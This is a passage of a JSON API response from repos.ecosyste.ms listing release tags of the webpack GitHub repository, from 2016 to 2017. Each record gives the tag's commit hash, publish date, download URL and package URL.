url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosy